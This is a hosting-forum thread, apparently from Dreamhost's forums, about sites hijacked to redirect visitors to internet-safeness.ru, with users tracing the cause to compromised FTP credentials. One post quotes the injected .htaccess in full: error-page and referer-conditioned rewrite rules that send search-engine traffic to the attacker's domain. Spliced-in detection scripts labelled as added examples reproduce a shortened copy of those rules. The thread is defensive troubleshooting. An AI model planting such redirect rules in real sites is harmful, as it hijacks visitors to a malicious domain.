Security issue! - Site redirecting (internet-safeness.ru)

wordpress

#1

Help asap please!!!

I run a phpBB forum, hosted on Dreamhost, as is the domain name.

Approximately an hour ago, whilst on the site, every time I tried to go to a topic or post I was redirected to Google, with the transitory domain address www.internet-safeness.ru appearing in the address bar mid-jump.

It doesn't appear to affect the admin area of the phpBB forum!!!

Any help please. It's a relatively small forum (2500 members with 500-600 active daily) but it has a small focus and is missed.

Is this a domain name issue, a Dreamhost issue, a phpBB issue??? Has the site been hacked??


#2

We are just customers here. We can’t really give you any input if you don’t tell us what your domain name actually is.


#3

No problem.

Domain is:

www.ulsterbandsforum.net


#4

Looks like you put it into maintenance mode. I can't really test it. If anything, though, it's a phpBB issue. You have probably been compromised. I would do a fresh install of the latest version. If it was some sort of injection attack I doubt your MySQL database has been tampered with, so you can just reuse the database. Might try to look for any recent changes to the PHP files, maybe.


#5

Thanks. Though two other domains I have on Dreamhost are having the same problem, so it doesn't look like it's a phpBB issue. One site uses Joomla and the other WordPress.


#6

If you use FileZilla, I've heard there is a Windows worm that steals FTP passwords. I don't have other info; that's basically from another recent thread on this forum.[hr]
Found it: http://discussion.dreamhost.com/thread-130909.html


#7

I haven't done any FTP with FileZilla in many, many months. But thanks for the feedback.

I cannot get any answers about this at all.


#8

You might want to check for the invisible image after the body tag being talked about over in that other thread.


#9

If you find that you have an img tag immediately following your body tag or some sort of redirection script, please report it here (this sounds like it is related):

Also, please let us know when the first hack took place and by what IP address.

This is likely the result of a compromised FTP username/password. I would suggest changing your password immediately. Also, your local computer may have been compromised by a worm that stole the file you keep the passwords stored in (i.e. Filezilla, CuteFTP, etc). Use only SFTP and do not store your passwords with these kinds of programs.


#10

Check all your .htaccess files for modification. My sites were hacked this week; they got in through an exploit in a WordPress theme and modified ALL my .htaccess files in the root of ALL my sites to redirect to a malicious site in Russia (.ru). You'll have to find where they're getting in and lock it down, because they'll keep coming back.

The redirect only happens under certain conditions, such as when someone clicks on your site in Google or Yahoo.

The embedded rewrite rules are not easily spotted upon first glance, but make sure you scroll, and you’ll find it.


#11

This is more than a changed .htaccess file. Given the information provided, it is likely these are all related. I have been going back and forth with the Dreamhost security team, a painful experience to say the least, to determine the hole, as I have now discovered that three of my FTP accounts on three different Dreamhost accounts (these are client accounts) have all been hacked in exactly the same way. Dreamhost takes a very litigious user-error approach to handling security questions (i.e. your code probably has vulnerabilities and is likely to blame, given this is likely true for most hacks).

I have worked through every possible attack vector and have narrowed it down to compromised FTP accounts. There are a number of ways this can happen, but I have determined in my case that it is most likely due to one of two things:

  1. An infected local machine that had its password file stolen from an FTP program (i.e. FileZilla, CuteFTP, etc.). Although, I have scanned my local computer and it reveals nothing.

  2. A compromise of Dreamhost's security where the attacker was able to access the user/pass of various FTP accounts within Dreamhost's system (it appears that passwords for FTP accounts are not encrypted within Dreamhost's system).

Can you guys run a "last" scan on your logs to see if any IPs other than your own have accessed your account since Aug 7? If so, post the log here.

If you do not know how to do this, I will post followup instructions later this afternoon.


#12

If you have been hacked, please run a "last" scan on your logs to see what IPs other than your own have accessed your account, and post the log here. This will help determine whether we were hacked because of a security compromise on Dreamhost's server or not. I asked the Dreamhost security department for help in figuring this out but was told they have well over a million accounts and manage thousands of servers, and as such the system administrators may not be able to readily answer this.

Following are instructions on running a "last" scan to see what IP addresses have logged in using your FTP account:

  1. In the Dreamhost panel, click on "manage user" and edit your FTP account, changing it to a "shell account".

  2. Download a shell program such as "PuTTY", which can be downloaded for free at: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

  3. Log in via PuTTY. You will put your web server for the host name. You can get this from the "Account Status" dropdown under "Your Web Server". So, if it says "XYZ" is your web server, then under "Host Name" in PuTTY you would put "xyz.dreamhost.com". Click "Open" and it will prompt you for a user name and password.

  4. After you have logged in, type the following two lines, replacing USERNAME with the username of your shell/FTP account, and hit return after each line. The first line will show who has logged in to your FTP account within the last 30 days. The second line will show the previous 30 days.

last -i | grep USERNAME
last -if /var/log/wtmp.1 | grep USERNAME

If it comes back with no info and just another prompt, try taking off a letter at the end of your username and try again (i.e. "USERNAME", 2nd try "USERNAM"). Keep doing this until it returns the log.
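The two `last` commands above leave you to eyeball the output. As an added example (not from any post in this thread), here is a small filter that takes `last -i` output on stdin and reports only logins to one account from addresses you do not recognise. The sample `last` output is constructed to look like the real thing; the user "alice" and all IP addresses in it are hypothetical.

```shell
# Added example: triage `last -i` output for logins from unfamiliar addresses.
# SAMPLE_LAST is CONSTRUCTED to mimic `last -i`; "alice", "bob" and the
# addresses are hypothetical.

SAMPLE_LAST='alice    pts/3        203.0.113.7      Mon Aug 10 07:02   still logged in
alice    ftpd1234     198.51.100.23    Sun Aug  9 03:14 - 03:15  (00:01)
alice    ftpd1235     198.51.100.23    Sun Aug  9 03:14 - 03:14  (00:00)
bob      pts/0        203.0.113.7      Sat Aug  8 22:10 - 22:30  (00:20)
alice    ftpd998      203.0.113.7      Fri Aug  7 18:45 - 18:50  (00:05)
alice    pts/1        203.0.113.7      Thu Aug  6 09:00 - 10:00  (01:00)

wtmp begins Sat Aug  1 00:00:01 2009'

# suspicious_logins USER "IP IP ..."   (reads `last -i` lines on stdin)
# Prints "IP<TAB>count" for every login to USER from an address that is not
# in the space-separated list, most frequent first. Field 1 is compared
# exactly: `last` may truncate long names in its user column, so pass the
# truncated form if grep on the full name returns nothing.
suspicious_logins() {
    awk -v user="$1" -v known="$2" '
        BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
        # field 3 is an address only because -i was used; header/footer lines
        # ("wtmp begins ...") and other users fall through the filter
        $1 == user && $3 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ && !($3 in ok) { hits[$3]++ }
        END { for (ip in hits) printf "%s\t%d\n", ip, hits[ip] }
    ' | sort -k2,2nr
}

# Stand-alone demo on the constructed sample: the owner connects from 203.0.113.7,
# so only the two ftpd logins from 198.51.100.23 are reported.
printf '%s\n' "$SAMPLE_LAST" | suspicious_logins alice "203.0.113.7"

# On the real host, push both the live and the rotated log through the filter:
#   { last -i; last -if /var/log/wtmp.1; } | suspicious_logins USERNAME "YOUR.HOME.IP"
```

Two caveats the thread itself raises: a login from an unknown address proves a credential was used from elsewhere, but an empty list proves little, because a PHP-level compromise under the same shell user never produces a login record at all.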


#13

Also, keep in mind that, if you have multiple domains hosted under the same user, it's quite common that a PHP vulnerability on one of your sites will end up modifying files which are under other sites. This won't show up as a login at all, since it's just a PHP script.


#14

Yes, a PHP vulnerability is a very common hack vector, and probably the majority of hack cases submitted to Dreamhost are a result of this. Also, if they hack one site and install, say, a shell script, they can hack any other site under the same account.

My hacked situation this week is not a PHP vulnerability, which is why I have posted here to the forums to see if any others have had the same hack. All three of my hacked sites were not just under different FTP accounts but also under three different Dreamhost accounts.

I have confirmed the FTP accounts were accessed by the same hacker (same IPs, times, dates). There are no shell scripts or the like. Only injected code. They used some sort of automated script to place the initial injection test code on all of the sites at the same time. The only common threads to these accounts are me (or my local computer) and Dreamhost. So I am thinking compromised local machine or compromised Dreamhost FTP system. In terms of my local machine, scans reveal nothing, and all of the other sites I have on other hosting companies have not been hacked. Only a few on Dreamhost.

I have been with Dreamhost for 10 years and as such have probably 70-90 sites hosted here for various clients. I’d rather not move them as that would be a major pain. It would just be great to know for sure which one was the source of the hole so I or Dreamhost can plug it up.


#15

Sounds like a similar problem I've had in the last few days, and maybe coming from the same source. Dreamhost alerted me that there had been a breach on a WP site hosted here, and attempts to view or access my site redirected to a .ru domain. My WP site was a personal blog that I didn't use much, so I didn't have a problem killing the site. I deleted the content of the site AND killed the database as well, then tried a fresh WP install and new MySQL database install as well. I can log into the WP admin panel, but if I click on "Appearance" or "Dashboard" or try to install a theme, it redirects me to "http://safenesscontent.ru/s4one/index.php". I'm not particularly an expert at the hosting thing, and partially chose DreamHost because of the one-click WP install, though I have played around with files, etc. I should also note that because of the 1-click install, I never used an FTP client for that site, just adjusted from the WP admin panel. However, I did have a Drupal install on another site that I have used an FTP client for. Still need to wade through that one…


#16

Hmmm, so actually it would be safer for each domain to be set up as a separate user then?
[hr]

[quote=“rob_la, post:14, topic:55845”]
So I am thinking compromised local machine or compromised Dreamhost FTP system. In terms of my local machine, scans reveal nothing and all of the other sites I have on other hosting companies have not been hacked.[/quote]

If someone was determined to steal passwords via a worm, it might be effective to delete the vector once the task was accomplished rather than leaving it behind for someone to discover, analyse, and create a way of preventing attacks in future…

Just a thought.[hr]

[quote=“Dickman91, post:15, topic:55845”]
I should also note that bc of the 1-click install, I never used an FTP client for that site, just adjusted from the WP admin panel.[/quote]

Unless you use https, whenever you log into your WP admin panel, your username and password are being sent unencrypted. Once that admin panel is compromised, you can install a plugin such as ‘add from server’ or modify a theme to get access to anything within that user account.


#17

I had an extension that forced https for logins, but I hadn’t actually logged in to the WP site in any way (via web admin panel or ftp) since early June, and the breach was maybe three days ago. Still not sure how to clean this up, especially after a fresh install of WP and MYSQL DB on that domain. Where could the breach be if that doesn’t clear it out?


#18

I'm having the "internet-safeness.ru" problem on some of my WordPress hosted sites, and on others I'm not (thank god).

The few that are seem to have been infected through Dreamhost FTP, not on my end.

It only happens when I go to Plugins and ADD plugins… I've replaced all those files with fresh ones, but I'm not going to replace the entire wp-admin folder since I'm not sure which file is scuffing it up (nor do I have time to search for it).

This one is pretty crafty.[hr]
Jesus… all this running around and I find the MAIN .htaccess file of my main user has this crap in it:

ErrorDocument 400 http://internet-safeness.ru/team/index.php
ErrorDocument 401 http://internet-safeness.ru/team/index.php
ErrorDocument 403 http://internet-safeness.ru/team/index.php
ErrorDocument 404 http://internet-safeness.ru/team/index.php
ErrorDocument 500 http://internet-safeness.ru/team/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://internet-safeness.ru/team/index.php [R=301,L]
</IfModule>
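The .htaccess above explains both symptoms reported in the thread: the ErrorDocument lines turn every 4xx/5xx page into an off-site redirect, and the RewriteRule only fires when the Referer header names a search engine or social site, which is why the owner browsing directly sees nothing while visitors arriving from Google are bounced. As an added example (not from any post here), the script below does what posts #4, #10 and #13 recommend by hand: it flags .htaccess directives that send visitors to an absolute http(s) URL or that condition on HTTP_REFERER, and lists .htaccess and .php files changed within a given number of days across every site under one shell user. The sample site tree is constructed; its hijacked .htaccess copies the shape of the directives quoted above and the clean one mimics ordinary front-controller rules.

```shell
# Added example: hunt hijacked .htaccess files and recently changed web files.
# The site tree built by make_sample_tree is CONSTRUCTED for the demo.

make_sample_tree() {
    dir=$1
    mkdir -p "$dir/blog" "$dir/forum"
    # shape of the injected rules quoted in the thread (abbreviated)
    cat > "$dir/blog/.htaccess" <<'EOF'
ErrorDocument 404 http://internet-safeness.ru/team/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://internet-safeness.ru/team/index.php [R=301,L]
</IfModule>
EOF
    # ordinary CMS rules: everything stays on-site
    cat > "$dir/forum/.htaccess" <<'EOF'
# rewrite everything that is not a real file to the front controller
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
EOF
    printf '<?php echo "hello"; ?>\n' > "$dir/forum/index.php"
}

# flag_htaccess FILE: print "lineno:directive" for each directive that
#   - points an ErrorDocument at an absolute http(s) URL (a redirect, not a page),
#   - has a RewriteRule whose target is an absolute http(s) URL, or
#   - conditions on HTTP_REFERER (the search-engine cloaking seen above).
# Exit status is grep's: 0 when something was flagged, 1 when clean.
flag_htaccess() {
    grep -n -i -E \
        '^[[:space:]]*(ErrorDocument[[:space:]]+[0-9]+[[:space:]]+https?://|RewriteRule[[:space:]].*[[:space:]]https?://|RewriteCond[[:space:]]+%[{]HTTP_REFERER[}])' \
        "$1"
}

# count_flags FILE: number of flagged directives (0 for a clean file)
count_flags() {
    flag_htaccess "$1" | wc -l | tr -d ' '
}

# recent_web_files DIR DAYS: .htaccess and .php files modified within DAYS days.
# Run it over the whole home directory, not one site: a PHP hole in one domain
# can rewrite files in every other domain under the same user with no login.
recent_web_files() {
    find "$1" -type f \( -name .htaccess -o -name '*.php' \) -mtime "-$2" -print
}

# Stand-alone demo on the constructed tree.
demo() {
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    for f in "$tmp"/*/.htaccess; do
        echo "== $f: $(count_flags "$f") suspicious directive(s)"
        flag_htaccess "$f" || true
    done
    echo "== web files changed in the last day:"
    recent_web_files "$tmp" 1
    rm -rf "$tmp"
}
demo
```

A Referer condition on its own is only a hint (hotlink protection uses it legitimately), so read the flagged lines rather than deleting on sight; an ErrorDocument or RewriteRule target on a domain you do not own is the line that matters. Note that mtime can be reset by an attacker with shell access, so an empty "recently changed" list does not clear a site.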

#19

Wow. Ok, this is me being ignorant, but how do I get to the .htaccess file?


#20

Not ignorant at all! You’ll need an FTP program. I use Cyberduck, but they all should have a VIEW “hidden files” it will be called .htaccess up top. You will have to duplicate the file, then change the name to htaccess.txt to download and edit it. When fooling with htaccess you always want to keep the backup and rename it something like 3htaccess or something too.

Hope that makes sense. I’ll report if I get this fixed.

First thing you should do is change your FTP password before doing all of this.

I’m guessing from the looks of those rewrite codes it’s been keylogging every one of those sites listed. BUMMER!!![hr]
BOOYAH!!! I’m happy to report that on the two sites I was having issues with, it WAS the .htaccess file. As soon as I deleted that and put a blank one in place, site works fine and all is well.

The most important thing here is to use a better password. I thought I had a pretty darn good one, but sometimes machines figure 'em out. I doubt it was anything on Dreamhost's end; I've been with them since 2002 and have never had these problems. Fucking hackers are getting more sophisticated, looking for loopholes, etc. Now I gotta be wary and change ALL of the passwords from any of those sites listed since 7am yesterday. Which luckily isn't many.

You can reward me for this fix by reading my comics at http://bigfootandtiki.com :slight_smile: